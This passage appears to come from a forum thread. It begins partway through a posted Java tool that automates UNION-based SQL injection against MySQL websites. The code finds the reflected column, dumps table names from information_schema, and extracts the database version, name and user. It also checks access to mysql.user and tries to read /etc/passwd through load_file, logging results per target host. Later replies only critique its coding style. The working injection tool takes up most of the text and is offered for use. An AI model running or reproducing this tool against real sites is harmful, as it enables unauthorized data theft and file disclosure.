            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting tables ....\n");

            code = toma(web1 + "+from+information_schema.tables--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] Tables Found : " + dos.group(1) + "\n");

                savefile(urla, "");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void scan(String urla) throws Exception {

            String codex;
            String target;

            Pattern uno = null;
            Matcher dos = null;

            target = urla;

            System.out.println("\n[+] Checking ...\n");

            // Precheck: a UNION with the wrong number of columns makes MySQL raise
            // "The used SELECT statements have a different number of columns".
            // This only works when the application echoes the database error into the page.
            codex = toma(target + "-1+union+select+666--");

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(codex);

            if (dos.find()) {
                System.out.println("[+] Scanning ...\n");

                int x;
                String urlfinal;
                String otrofinal;
                String code;
                String formariny;
                String otroformar;
                String link;

                urlfinal = "";
                formariny = "";

                // Probe 1 to 5 columns only; each column carries its own numbered marker so the
                // response shows both the column count and which column is reflected.
                for (x = 1; x <= 5; x = x + 1) {

    //urlfinal = urlfinal+x+",";
                    urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                    formariny = formariny + x + ",";

                    otrofinal = urlfinal;
                    otroformar = formariny;

                    otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                    otroformar = otroformar.substring(0, otroformar.length() - 1);

                    code = toma(target + "-1+union+select+" + otrofinal);

                    uno = Pattern.compile("RATSXPDOWN(\\d+)");
                    dos = uno.matcher(code);

                    if (dos.find()) {

                        otroformar = otroformar.replace(dos.group(1), "hackman");

                        link = target + "-1+union+select+" + otroformar;

                        System.out.println("[Target] : " + link);
                        System.out.println("[Limit] : The site has " + x + " columns");
                        System.out.println("[Data] : The number " + dos.group(1) + " print data");

                        savefile(link, "\r\n" + "[Target] : " + link);
                        savefile(link, "[Limit] : The site has " + x + " columns");
                        savefile(link, "[Data] : The number " + dos.group(1) + " print data");

                        manejo(link);

                        // the interactive menu has returned; finish with a success status
                        System.exit(0);

                    }

                }
                System.out.println("[-] Error : no reflected column found with 1 to 5 columns");
            } else {
                System.out.println("[-] Not vulnerable");
            }

        }

        private static void details(String urla) throws Exception {

            String concat;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

            urla = urla.replace("hackman", concat);

            System.out.println("\n[+] Searching information ...\n");

            code = toma(urla);

            uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] DB Version : " + dos.group(1));
                System.out.println("[+] DB Name : " + dos.group(2));
                System.out.println("[+] Username : " + dos.group(3));

                savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
                savefile(urla, "[+] DB Name : " + dos.group(2));
                savefile(urla, "[+] Username : " + dos.group(3));

            } else {
                System.out.println("[-] Not found any data");
            }

            urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

            code = toma(urla + "+from+information_schema.tables--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] information_schema : on");
                savefile(urla, "[+] information_schema : on");
            } else {
                System.out.println("[-] information_schema : off");
            }

            code = toma(urla + "+from+mysql.user--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] mysqluser : on");
                savefile(urla, "[+] mysqluser : on");
            } else {
                System.out.println("[-] mysqluser : off");
            }

            // FILE privilege test: try to read /etc/passwd (0x2f6574632f706173737764).
            // Only meaningful on Unix hosts. A NULL from load_file() makes the whole
            // concat() NULL, so the marker is absent whenever the read fails.
            urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

            code = toma(urla);
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] load_file : on");
                savefile(urla, "[+] load_file : on");
            } else {
                System.out.println("[-] load_file : off");
            }

        }

        private static void savefile(String nombre, String texto) throws Exception {

            String formar;

            URL h = new URL(nombre);

            // One appended log per target host. FileWriter does not create parent
            // directories, so make sure logs/ exists before the first write.
            new java.io.File("logs").mkdirs();
            formar = "logs/" + h.getHost() + ".txt";

            // try-with-resources closes the file even if write() throws
            try (FileWriter writer = new FileWriter(formar, true)) {
                writer.write(texto + "\r\n");
            }

        }

        private static String toma(String urla) throws Exception {

            String re;

            StringBuffer conte = new StringBuffer(40);

            URL url = new URL(urla);
            java.net.HttpURLConnection hc = (java.net.HttpURLConnection) url.openConnection();
            hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
            hc.setConnectTimeout(10000);
            hc.setReadTimeout(10000);

            // Some targets answer a broken UNION with HTTP 500 and the MySQL error in the
            // body. getInputStream() throws on such a status, which would abort the scan,
            // so read the error stream instead and keep going.
            java.io.InputStream in;
            if (hc.getResponseCode() >= 400) {
                in = hc.getErrorStream();
            } else {
                in = hc.getInputStream();
            }
            if (in == null) {
                return "";
            }

            BufferedReader nave = new BufferedReader(new InputStreamReader(in));

            // Lines are concatenated without separators, so the K0BRA(.*)K0BRA style
            // patterns still match when the page breaks a line inside the marker.
            while ((re = nave.readLine()) != null) {
                conte.append(re);
            }

            nave.close();

            return conte.toString();

        }

        public static String encodehex(String text) {

    //Thanks to Katarina Majetic
    //Based on http://www.dzone.com/snippets/encode-string-hex

            // Builds a MySQL hex literal (0x...) so the marker needs no quotes in the
            // injected SELECT. Each byte must be zero-padded to two digits:
            // Integer.toHexString(0x0A) returns "a", which would corrupt the literal
            // for any byte below 0x10, so String.format("%02x") is used instead.
            byte[] z = text.getBytes(java.nio.charset.StandardCharsets.US_ASCII);
            StringBuffer h = new StringBuffer();
            int n;
            int a = z.length;
            int u;

            for (n = 0; n < a; n++) {
                u = z[n] & 0x000000FF;
                h.append(String.format("%02x", u));
            }
            return "0x" + h.toString();
        }
    }

    //The End ?

Honestly, the only thing Java about it is the syntax; you're not using the potential it offers....

Regards.
My mother told me I'm destined to be poor my whole life.
Engineering is the art of balancing the benefits and drawbacks of any approach.

And how do I use that potential in this program?

I don't know if you've noticed, but to add any new functionality you have to modify the source directly. It also violates many principles, which is why anyone who wants to build or add some functionality or fix something has to read the entire source.

That style of programming is very old and was normally used to do one specific task, on the understanding that the source would never change and no functionality would be added, i.e. there would only ever be a single version. That form is still used today for writing exploits, since an exploit is written to exploit one specific vulnerability and once it has been run that's it; there's no need to release another version of the same exploit that follows exactly the same steps.

And as you say, what you have is a "program", and you have to try to use very good programming practices in order to create scalable applications.

Regards.

I'm not very clear on what you told me because I'm just starting out in Java, but thanks for the explanation.